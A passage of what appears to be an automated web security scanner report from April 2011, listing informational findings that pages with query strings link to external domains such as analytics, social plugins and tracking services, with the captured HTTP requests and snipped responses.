<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...
<div><img src="https://s.analytics.yahoo.com/p.pl?a=1000725800122&amp;js=no" width="1" height="1" alt="" /></div>
...[SNIP]...

22.48. https://www.controlscan.com/shoppingcart.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.controlscan.com
Path:   /shoppingcart.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /shoppingcart.php?itemsadded=1 HTTP/1.1
Host: www.controlscan.com
Connection: keep-alive
Referer: https://www.controlscan.com/shoppingcart.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=00f4el4lcuvnop42qop34mkqh4; __utmz=180386997.1303732833.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fpc1000725800122=O1TwOju5|4ybarsbLaa|fses1000725800122=|4ybarsbLaa|O1TwOju5|fvis1000725800122=Zj1odHRwcyUzQSUyRiUyRnd3dy5jb250cm9sc2Nhbi5jb20lMkYmYj1Db250cm9sU2NhbiUyMFBDSSUyMENvbXBsaWFuY2UlMjAlN0MlMjBHZXQlMjBQQ0klMjBDb21wbGlhbnQlMjBUb2RheSE=|8MYMHMsoss|8MYMHMsoss|8MYMHMsoss|8|8MYMHMsoss|8MYMHMsoss; __utma=180386997.730761609.1303732833.1303732833.1303735963.2; __utmc=180386997; __utmb=180386997.3.10.1303735963; com.vtrenz.iMAWebCookie=49379056-69d2-6147-26ad-65d29c6189eb; com.vtrenz.iMA.session=3cd51bd8-477e-ec0e-65cc-8ca3a9c2b5ac

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:55:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="PHY DEM ONL STA PUR NAV COM OUR DELo CUR ADM DEV IDC COR BUS DSP"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!-- BEGIN LIVECHAT track tag. See also www.livechatinc.com -->
<script language="JavaScript" src="//server.livechatinc.net/licence/1004853/script.cgi?lang=en&amp;groups=0" type="text/javascript"></script>
...[SNIP]...
<!-- Verisign Seal-->
<script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.controlscan.com&amp;size=M&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en"></script>
...[SNIP]...
<!-- VTRENZ Tracking-->
<script src="https://gw-services.vtrenz.net/WebCookies/iMAWebCookie.js?05B7F374-D914-47E4-8F04-8DF29390CEC9" type="text/javascript"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="https://s.yimg.com/mi/eu/ywa.js"></script>
...[SNIP]...
<div><img src="https://s.analytics.yahoo.com/p.pl?a=1000725800122&amp;js=no" width="1" height="1" alt="" /></div>
...[SNIP]...

22.49. http://www.depthsecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.depthsecurity.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /?gclid=CKbh46DPt6gCFcQSNAodRgFuBQ HTTP/1.1
Host: www.depthsecurity.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=5781286.1303732840.1.1.utmgclid=CKbh46DPt6gCFcQSNAodRgFuBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=5781286.184354172.1303732840.1303732840.1303732840.1; __utmc=5781286

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 6045
Content-Type: text/html; charset=utf-8
Server: DepthServ-FU/8.0
X-Powered-By: DepthScript.fu
Date: Mon, 25 Apr 2011 12:52:40 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Depth
...[SNIP]...
<li><a href="http://depthsecurity.blogspot.com" target=..._blank...>Check Out the <b>
...[SNIP]...

22.50. http://www.eset.com/us/business/products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/business/products

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303732844.1.1.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303732844.1; __utmc=1; s_pers=%20s_visit%3D1%7C1303734644038%3B%20gpv_pageName%3Dus/business/products%7C1303734644042%3B%20s_nr%3D1303732844048-New%7C1335268844048%3B%20s_vnum%3D1335268844052%2526vn%253D1%7C1335268844052%3B%20s_invisit%3Dtrue%7C1303734644052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B; s_sess=%20s_cc%3Dtrue%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cpc%3D1%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 21066
Date: Mon, 25 Apr 2011 12:52:44 GMT
X-Varnish: 1310965243
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<li><a href="http://shopping.netsuite.com/s.nl?sc=3&amp;c=438708&amp;n=1&amp;ext=T" class="header_cart" onclick="_hbLink('Header Nav Cart');">Cart <!--(1 item)-->
...[SNIP]...
<li><a href="https://checkout.netsuite.com/c.438708/Return_Policy.html" onclick="window.open(this.href);return false;">Return Policy</a>
...[SNIP]...
<div class="social_media_icons">
       <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</fb:like>
   <a href="http://www.facebook.com/esetusa" onclick="window.open(this.href);return false;"><img src="/us/images/social/facebook_icon.gif" alt="Visit ESET on Facebook" /></a>
<a href="http://www.twitter.com/eset" onclick="window.open(this.href);return false;"><img src="/us/images/social/twitter_icon.gif" alt="Follow ESET on Twitter" /></a>
<a href="http://www.youtube.com/user/esetusa" onclick="window.open(this.href);return false;"><img src="/us/images/social/youtube_icon.gif" alt="ESET YouTube Channel" />
...[SNIP]...
<div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.51. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.150.41
X-Cnection: close
Date: Mon, 25 Apr 2011 12:52:48 GMT
Content-Length: 8179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/nogz-s5wETe.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/I8QAd_a7Pbh.js"></script>
...[SNIP]...

22.52. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=4&ved=0CC0QFjAD&url=http%3A%2F%2Flearn.shavlik.com%2Fshavlik%2Findex.cfm%3Fm%3D523%26pg%3D373%26h%3D0%26hp%3D373&ei=Um21TcmnJ83itgeO9OnpDg&usg=AFQjCNHcoCcsIqeas7ROQLotiEACsj1yhA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 302 Found
Location: http://learn.shavlik.com/shavlik/index.cfm?m=523&pg=373&h=0&hp=373
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:47:24 GMT
Server: gws
Content-Length: 275
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://learn.shavlik.com/shavlik/index.cfm?m=523&amp;pg=373&amp;h=0&amp;hp=373">here</A>
...[SNIP]...

22.53. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=2&ved=0CCEQFjAB&url=http%3A%2F%2Flearn.shavlik.com%2Fshavlik%2Findex.cfm%3Fpg%3D363&ei=Um21TcmnJ83itgeO9OnpDg&usg=AFQjCNE-SEZeBLTzqftyF712qYqdlDQNBQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 302 Found
Location: http://learn.shavlik.com/shavlik/index.cfm?pg=363
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:47:27 GMT
Server: gws
Content-Length: 246
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://learn.shavlik.com/shavlik/index.cfm?pg=363">here</A>
...[SNIP]...

22.54. http://www.google.com/url  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=3&ved=0CCcQFjAC&url=http%3A%2F%2Flearn.shavlik.com%2Fshavlik%2Findex.cfm%3Fm%3D521%26pg%3D372%26h%3D0%26hp%3D372&ei=Um21TcmnJ83itgeO9OnpDg&usg=AFQjCNFY-jnfFXDANGn53BN5aNJep4PgYQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 302 Found
Location: http://learn.shavlik.com/shavlik/index.cfm?m=521&pg=372&h=0&hp=372
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 25 Apr 2011 12:47:21 GMT
Server: gws
Content-Length: 275
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://learn.shavlik.com/shavlik/index.cfm?m=521&amp;pg=372&amp;h=0&amp;hp=372">here</A>
...[SNIP]...

22.55. http://www.googleadservices.com/pagead/conversion/1072501689/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1072501689/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/conversion/1072501689/?random=1303733542110&cv=6&fst=1303733542110&num=1&fmt=1&value=1&label=pageview&bg=FFFFFF&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&ref=http%3A//www.manageengine.com/products/security-manager/store.html&url=http%3A//www.manageengine.com/products/security-manager/download.html HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/download.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Conversion=CoMBQ0NlaVJUV0sxVGJfZ0U0R2cwQUdYN3JSRWtLcXFINWFWb05BT19aMkZXUkFJS0FoUWo1T1c2UF9fX19fX0FXREo3b09JOEtQc0VxQUJ1YWUwX3dQSUFRR3FCQjFQMENmTDFTZ3NRV1BpYU5RT3J1TWttYjNZdGZVYlliVzZQSkpSdncSEwi_vf-kz7eoAhUE3uAKHZUYjgsYASDO0K-h-qz6mWtIAQ

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Mon, 25 Apr 2011 12:12:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Set-Cookie: Conversion=CoMBQ0NlaVJUV0sxVGJfZ0U0R2cwQUdYN3JSRWtLcXFINWFWb05BT19aMkZXUkFJS0FoUWo1T1c2UF9fX19fX0FXREo3b09JOEtQc0VxQUJ1YWUwX3dQSUFRR3FCQjFQMENmTDFTZ3NRV1BpYU5RT3J1TWttYjNZdGZVYlliVzZQSkpSdncSEwi_vf-kz7eoAhUE3uAKHZUYjgsYACCrq-zczvrRxb0BSAE; expires=Wed, 25-May-2011 12:00:36 GMT; path=/pagead/conversion/1072501689/
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072501689/?random=1303733542110&cv=6&fst=1303733542110&num=1&fmt=1&value=1&label=pageview&bg=FFFFFF&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&ref=http%3A//www.manageengine.com/products/security-manager/store.html&url=http%3A//www.manageengine.com/products/security-manager/download.html&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 378

<html><body bgcolor="#ffffff" link="#000000" alink="#000000" vlink="#000000" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans-serif" color="#000000">Google Site Stats - <a href="https://services.google.com/sitestats/en.html?cid=1072501689" target="_blank">learn more</a>
...[SNIP]...

22.56. http://www.iveco-ptc.spb.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iveco-ptc.spb.ru
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?_openstat=ZGlyZWN0LnlhbmRleC5ydTszMjIwNzI7NDQzMjM3O3lhbmRleC5ydTpndWFyYW50ZWU HTTP/1.1
Host: www.iveco-ptc.spb.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Mon, 25 Apr 2011 14:32:46 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=32638563fd192774612570ede2bad57a; path=/
Content-Length: 19221

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="
...[SNIP]...
<li class=""><a href="http://www.nh-ptc.ru/" class="" target="_blank">........................ ..............</a>
...[SNIP]...
<!-- Yandex.Metrika counter -->
<script src="//mc.yandex.ru/metrika/watch.js"
type="text/javascript">
</script>
...[SNIP]...
<div><img src="//mc.yandex.ru/watch/157241"
style="position:absolute; left:-9999px;" alt="" />
</div>
...[SNIP]...

22.57. http://www.manageengine.com/products/security-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /products/security-manager/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.2.10.1303732848
If-None-Match: "d3ec-49f24fc659f40"
If-Modified-Since: Wed, 23 Mar 2011 11:51:49 GMT

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:11:53 GMT
Server: Apache
Last-Modified: Wed, 23 Mar 2011 11:51:49 GMT
ETag: "d3ec-49f24fc659f40"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:11:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 54252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan
...[SNIP]...
<div class="smp_live_demo"><a name="Security-Manager-Plus-Live-Demo" title="Security Manager Plus Live Demo" href="http://demo.securitymanagerplus.com/">Security Manager Plus Live Demo</a>
...[SNIP]...
</span>&nbsp;<a href="http://www.zohocorp.com/"><strong>
...[SNIP]...
</a>. All rights reserved. <a href="http://www.webnms.com" title="WebNMS Home" name="WebNMS-Home">WebNMS Home</a>
...[SNIP]...
<br />
<a href="http://www.site24x7.com" class="secondlevellink" title="Website Monitoring" name="Website-Monitoring">Website Monitoring</a>
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

22.58. http://www.manageengine.com/products/security-manager/download.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /products/security-manager/download.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products/security-manager/download.html?features HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:12:03 GMT
Server: Apache
Last-Modified: Mon, 25 Apr 2011 10:28:00 GMT
ETag: "15369-4a1bba9688c00"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:12:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 86889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan
...[SNIP]...
</script>
<script language="JavaScript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<img height=1 width=1 border=0 src="http://www.googleadservices.com/pagead/conversion/1072501689/?value=1&label=pageview&script=0">
</noscript>
...[SNIP]...
</script><script id="mstag_tops"type="text/javascript"src="//flex.atdmt.com/mstag/site/b060e217-431e-47e2-b8f7-c11fe85e301e/mstag.js"></script>
...[SNIP]...
<noscript><iframe src="//flex.atdmt.com/mstag/tag/b060e217-431e-47e2-b8f7-c11fe85e301e/conversion.html?cp=5050&dedup=1"frameborder="0"scrolling="no"width="1"height="1"style="visibility:hidden;display:none"></iframe>
...[SNIP]...
<div class="smp_live_demo"><a name="Security-Manager-Plus-Live-Demo" title="Security Manager Plus Live Demo" href="http://demo.securitymanagerplus.com/">Security Manager Plus Live Demo</a>
...[SNIP]...
</span>&nbsp;<a href="http://www.zohocorp.com/"><strong>
...[SNIP]...
</a>. All rights reserved. <a href="http://www.webnms.com" title="WebNMS Home" name="WebNMS-Home">WebNMS Home</a>
...[SNIP]...
<br />
<a href="http://www.site24x7.com" class="secondlevellink" title="Website Monitoring" name="Website-Monitoring">Website Monitoring</a>
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
<!-- InstanceEndEditable -->
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

22.59. http://www.outpost24.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outpost24.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?gclid=CIzv2JrPt6gCFQUQNAod6VpNBg HTTP/1.1
Host: www.outpost24.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wooTracker=Z0OLUUFD2A8CJ3SSJOPK3JITJKI5488S; wooMeta=MTA0MTM1JjEmMSYyNDI5MzYmMTMwMzczMjgxODc3OCYxMzAzNzMzMDYxNjk3JiYxMDAmJjUwMDExNSYmJiY=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:27 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 12630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       
...[SNIP]...
